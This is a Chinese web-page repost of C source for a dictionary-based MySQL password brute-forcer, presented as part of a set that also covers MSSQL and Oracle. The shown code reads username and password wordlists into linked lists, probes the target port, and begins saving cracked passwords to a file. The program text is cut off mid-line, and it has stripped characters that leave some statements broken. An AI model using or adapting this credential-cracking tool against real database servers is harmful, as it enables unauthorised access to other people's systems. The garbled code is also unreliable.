当前位置:数据库 > Oracle >>

用链表实现的MYSQL、MSSQL和oracle密码暴破C程序

议题作者:pt007[at]vip.sina.com版权所有,转载请注明版权
信息来源:易做图八进制信息安全团队
/*程序一:用链表实现的MYSQL密码暴破程序,参考了zhouzhen@gmail.com的程序,进行了一些修改*/
#define WIN32_LEAN_AND_MEAN
#if defined(_WIN32) || defined(_WIN64)
#include <windows.h>
#include <Tchar.h>
#endif
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include "F:pt007fdatabasemysqlmysql_pwd_crackincludemysql.h"
#include <stdlib.h>
//链接到WS2_32.LIB库:
#pragma comment(lib, "Ws2_32.lib")
#pragma comment(lib, "libmySQL.lib")
//定义链表:
typedef struct PassNode{
TCHAR password[100];
struct PassNode * Next;
} PassInfo;
typedef struct NameNode{
TCHAR Name[100];
struct NameNode * Next;
}NameInfo;
void usage(){
printf("mysql password crack v 1.0 ");
printf(" author:zhouzhen@gmail.com and pt007@vip.sina.com ");
fprintf(stdout,"usage : mysql_pwd_crack [ip] [options] ");
printf("options: "
" -u username specify the username of mysql "
" -x port specify the port of mysql "
" -p password specify the password of mysql "
" -d dict specify the dictionary "
" -a automode automatic crack the mysql password "
" Note: when u use the -a option, named the username dict user.dic "
" password dict pass.dic "
);
printf(" example: mysql_pwd_crack 127.0.0.1 -x 3306 -u sql_user.dic -d pass.dic ");
printf(" mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.dic ");
printf(" mysql_pwd_crack 127.0.0.1 -x 3306 -a ");
exit(1);
}
PassInfo * Create_Pass_link(int NodeNum, FILE * DictFile){
/* read data from password dictionary, init the link */
TCHAR * szTempPass = NULL;
PassInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/
if ( (h = (PassInfo *) malloc(sizeof(PassInfo))) == NULL )
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
} /* create the head node */
/* init the head node*/
h->Next = NULL;
p = h;
for ( i=0; i < NodeNum; i ++)
{
szTempPass = (TCHAR *)calloc(100, sizeof(TCHAR));
ZeroMemory(szTempPass, 100);
if ( (s = (PassInfo *)malloc(sizeof(PassInfo))) == NULL)
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
}
memset(s->password, , 100);
fgets(szTempPass, 100, DictFile);
strncpy(s->password, szTempPass, strlen(szTempPass)-1);
s->Next =NULL;
p->Next = s;
p = s;
free(szTempPass);
}
return h;
}
NameInfo * Create_Name_link(int NodeNum, FILE * DictFile){
/* read data from password dictionary, init the link */
TCHAR * szTempName = NULL;
NameInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/
if ( (h = (NameInfo *) malloc(sizeof(NameInfo))) == NULL )
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
} /* create the head node */
/* init the head node*/
h->Next = NULL;
p = h;
for ( i=0; i < NodeNum; i ++)
{
szTempName = (TCHAR *)calloc(100, sizeof(TCHAR));
ZeroMemory(szTempName, 100);
if ( (s = (NameInfo *)malloc(sizeof(NameInfo))) == NULL)
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
}
memset(s->Name, , 100);
fgets(szTempName, 100, DictFile);
strncpy(s->Name, szTempName, strlen(szTempName)-1);
s->Next =NULL;
p->Next = s;
p = s;
free(szTempName);
}
return h;
}
int LineCount(FILE * fd) //返回字典中的密码数量
{
int countline = 0;
char data[100] = {0};//字符数组清0
while (fgets(data, 100, fd))//从指定的文件中读一个字符串到字符数组中
countline++;
rewind(fd);//指针返回到文件起始处
return countline;
}
BOOL IsPortOpen(char * address, int port)
{
int recv = 1;
WSADATA wsadata;
int fd;
struct sockaddr_in clientaddress;
struct hostent * host1;
BOOL Result = FALSE;
struct timeval timer4;
fd_set writefd; //检查数据是否可写
ULONG value = 1;
//初使化winsock版本1.1:
recv = WSAStartup(MAKEWORD(1,1), &wsadata);
if(recv != 0)
{
printf("init failed %d. ",WSAGetLastError());
return(0);
}
if ( LOBYTE( wsadata.wVersion ) != 1 ||
HIBYTE( wsadata.wVersion ) != 1 ) {
/* Tell the user that we couldnt find a useable */
/* winsock.dll. */
WSACleanup();
return(0);
}
//创建socket套接字连接:
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(fd < 0)
{
printf("[-] Create socket error %d. ",WSAGetLastError());
return(0);
}
//将套接字fd设为非阻塞模式的方法:
ioctlsocket(fd,FIONBIO,&value);
if (!(host1 = gethostbyname(address))){
printf("[-] Gethostbyname(%s) error %d. ",address,WSAGetLastError());
return(0);
}
memset(&clientaddress, 0, sizeof(struct sockaddr));
clientaddress.sin_family =AF_INET;//Ipv4地址族
clientaddress.sin_port = htons((unsigned short)port);
clientaddress.sin_addr = *((struct in_addr *)host1->h_addr);
timer4.tv_sec = 5;//以秒为单位指定等待时间
timer4.tv_usec = 0;
FD_ZERO(&writefd);
FD_SET(fd,&writefd); //将套接字fd增添到writefd写集合中进行测试
recv = connect(fd, (struct sockaddr *)&clientaddress, sizeof(struct sockaddr));
if( FD_ISSET(fd, &writefd))
{
recv = select(fd+1, NULL, &writefd, NULL, &timer4);//测试5秒钟内是否有数据写入
if( recv > 0 )
Result = TRUE;
}
closesocket(fd);
WSACleanup();
return Result;
}
int main(int argc, char **argv)
{
MYSQL *sock,mysql;//定义MYSQL结构
PassInfo * head, * curr = NULL;
NameInfo * headnode, * currnode = NULL;
int namecount = 0, passcount = 0;
/////////////////////////////////////////////////////////////////////////////////////////////
// deal with the command line
//
/////////////////////////////////////////////////////////////////////////////////////////////
if( argc != 5) //参数不为5或8个的时候打印帮助
if(argc != 8)
usage();
if (argc == 8)
{
if ( strcmpi(argv[2], "-x") )
usage();
if ( strcmpi(argv[4], "-u") )
if ( strcmpi(argv[4], "-p") )
usage();
if ( !strcmpi(argv[4], "-u") )
if ( strcmpi(argv[6], "-d") )
usage();
if ( !strcmpi(argv[4], "-p") )
if ( strcmpi(argv[6], "-d") )
usage();
}
if (argc == 5)
{
if ( strcmpi(argv[2], "-x") )
usage();
if ( strcmpi(argv[4], "-a") )
usage();
}
/* determinate whether the mysql port is open */
if( !IsPortOpen(argv[1], atoi(argv[3]) ) )
{
printf("error:Cant connect to %s:%d ", argv[1], atoi(argv[3]));
exit(0);
}
////////////////////////////////////////////////////////////////////////////////////////////
// specifiy the username
//////////////////////////////////////////////////////////////////////////////////////////////
mysql_init(&mysql); /* init the mysql */
if ( !strcmpi(argv[4], "-u"))
{
/* open the password dictionary */
FILE * passdic = NULL;
if ( (passdic = fopen(argv[7], "r")) ==NULL){
fprintf(stdout, "Cant open the password dictionary ");
exit(0);
}
/* count line of name dictionary */
passcount = LineCount(passdic); //计算密码的数量
head = Create_Pass_link(passcount, passdic); /* create the password link */
curr = head ->Next;
/* open the password dictionary */
FILE * Namedict = NULL;
if ( (Namedict = fopen(argv[5], "r")) ==NULL){
fprintf(stderr, "Cant open the name dictionary ");
exit(0);
}
/*密码最终保存文件*/
FILE *passtxt=NULL;
if ( (passtxt = fopen("pass.txt", "at+")) ==NULL){
fprintf(stdout, "Cant write pass.txt file! ");
exit(0);
}
/* count line of name dictionary */
namecount = LineCount(Namedict);//计算用户名数量
headnode = Crea
补充:综合编程 , 安全编程 ,
CopyRight © 2022 站长资源库 编程知识问答 zzzyk.com All Rights Reserved
部分文章来自网络,